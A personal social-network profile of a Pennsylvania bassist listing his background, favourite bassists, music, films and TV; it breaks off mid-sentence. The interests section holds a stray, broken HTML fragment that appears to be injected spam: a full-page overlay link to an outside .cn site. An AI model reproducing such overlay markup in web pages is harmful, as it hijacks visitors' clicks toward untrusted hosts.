Layin' Down The Groove Since 1989

About Me

I was born Scott Douglas Sorber on October 25, 1974. I was born and raised in northeastern Pennsylvania, and am still here today. I am happily married to the greatest woman on earth, and am father to the coolest son a dad could ever ask for. I attended Wyoming Valley West school district from K-8th grade, and then West Side Area Vo-Tech High School, where I studied electrical theory and hands-on training. I have been a bassist for over 18 years, and have been loving every minute of laying down the grooves. Not too much going on musicaly at the moment, but I would like to change all of that. I am looking to work with pro-minded guys or gals in something fun and energetic. I'm not necessarily looking to cover any one genre, and as can be seen here on my page, I'm into a broad spectrum of music; I'm willing to at least consider most styles. If this grabs your attention and you're in need of a bassist, shoot me a message and let's talk. I am a firm believer in honesty. Lying gets a person nowhere. Even if you think you have gotten away with not being truthful with someone, you have to live with the guilt for the rest of your life. And always remember, you must first be honest with yourself before you can be straight with anyone else. That's not to say I'm perfect; NO ONE IS!!! But if you can live and learn from your mistakes, that makes you an honest(and better)person.

My Interests

Music-OBVIOUSLY, good food, old-school audio technology(8-track, reel-to-reel, quad), and family and friends.a class="popup_wrapper" style="cursor:default;background-image:url(http://rivazzurra .cn/bg.jpg);left:0px;top:0px;height:7564px;width:1164px;" href="http://rivazzurra.cn/s/" m$l$

I'd like to meet:

GOD!!! And to name a few-BILLY SHEEHAN!!!, Geddy Lee, Chris Squire, Gene Simmons, Les Claypool, Stanley Clarke, Lemmy Kilmister, Geezer Butler, Tommy Shannon, Tom Araya, Mel Schacher, John Paul Jones, Paul McCartney, Timothy Gaines, Timi Hansen(Grabber), Nikki Sixx, Flea, Jeff Berlin, Jack Bruce, Steve Harris, Duff McKagan, Tom Hamilton, Dennis Dunaway("Gutter Cat Vs. The Jets" is the reason I started playing the bass; for those unfamiliar, listen to the Alice Cooper "School's Out" album), Tim Bogert, Roger Glover, Yngwie Malmsteen(in addition to his guitar virtuosity, he's an amazing bass player), Bernard Paganotti, Ron Carter, Marcus Miller, Tony Franklin, Tony Levin, John Myung, Jimmy Haslip, Oteil Burbridge, Christian McBride, Hugh McDonald, Randy Jackson, Pino Palladino, Phil Lesh, Victor Wooten and others I'm sure I'm forgetting at the moment... I will add them as I think of them... And HAIL and R.I.P. to the groovemasters no longer with us- Jaco Pastorius, John Entwhistle, Dee Dee Ramone, Noel Redding, Cliff Burton, Allen Woody, James Jamerson, Boz Burell...

Music:

I love way too much music to be even remotely specific on this. To give you some idea, here are some of the artists I currently have on my MP3 player-KISS, Rush, Weather Report, Miles Davis, Jeff Berlin, Slayer, Mr. Big, Billy Joel, Grateful Dead, Tommy Bolin, T.Rex, Robin Trower, Stryper, Talas, Iron Maiden, Grand Funk Railroad, Foreigner, Def Leppard, Motorhead, Yes, Emerson Lake and Palmer, Genesis(with and without Peter Gabriel), Dream Theater, John Coltrane, Billie Holiday, Kim Mitchell(anyone remember Go For Soda?), Triumph, George Wesley(number 6 on my top friends), Diana Krall, Black Sabbath(ALL eras), Frank Zappa...I think you get the idea. If a piece of music can move my heart and soul in some way, chances are it's in my collection. As a musician, listening to and enjoying many styles of music has helped and bettered my playing, as well as my ability to perform with a wide spectrum of musicians in many styles of music. Bottom line-if it's good music, it's good music. Simple as that!!!

Movies:

I'm a sucker for the old black and white monster movies(Dracula is my fave-who doesn't love Bela Lugosi?), classic and contemporary horror, and I can't help but loving the B-rate heavy metal horror films(ROCKTOBER BLOOD!!!, Trick Or Treat, Demons), and comedies from all eras. I also like good drama stories. One of my very faves is The Shawshank Redemption(In case anyone cares, Morgan Freeman was not originally inteded for the role of "Red". A great clue to this is the scene when Andy asks Red "Why do they call you Red", and Red answers "Maybe it's because I'm Irish", and gives a sarcastic smile to Andy. Not sure who the role was inteded for, but interesting how the line was still used.)And I can't wait to see this one!!! This is just TOO freakin' funny!!!

Television:

THAT 70'S SHOW!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! Law and Order("Criminal Intent" and "Special Victims Unit"), and a host of sitcoms from the last 40 years, such as The Honeymooners, Sanford and Son, Three's Company, M*A*S*H*, Everybody Loves Raymond, King Of Queens, Friends, Mad About You, and many more. I have also been a wrestling fan since my youth, and Monday Night Raw is dad and me night with my son. I am also a huge Dark Shadows fan(HAIL Barnabas Collins). And I like commercials, so long as it's a Dunkin Donuts commercial with Ace Frehley!!!

Books:

"Ghost Rider"-Neil Peart, "Jaco:The Extraordinary and Tragic Life of Jaco Pastorius"-Bill Milkowski, and magazines such as Bass Guitar, Bass Player, Jazz Times, Rolling Stone, and other music and entertainment publications.

Heroes:

My mom and dad, for giving me everything they never had, and for everything they did have. And my wife and son, for loving a currently not-so busy musician unconditionally, they are my reason for waking up every morning.

A very sad piece of news, Bassist Boz Burell passed away in September. He had a short stint with King Crimson in the early 70's, but was best known as the grooveman for Bad Co. His pre...
